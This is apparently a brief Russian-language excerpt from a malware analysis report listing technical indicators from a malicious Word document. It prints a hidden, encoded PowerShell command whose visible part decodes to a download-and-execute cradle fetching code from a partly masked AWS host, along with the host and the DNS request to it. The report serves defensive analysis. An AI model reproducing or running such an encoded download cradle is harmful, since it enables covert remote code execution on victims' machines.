Техническая информация
- '%ProgramFiles%\microsoft office\office14\winword.exe' -exec bypass -WindowStyle Hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AZQBjADIALQA...
- winword.exe
- 'ec############89.eu-central-1.compute.amazonaws.com':80
- DNS ASK ec############89.eu-central-1.compute.amazonaws.com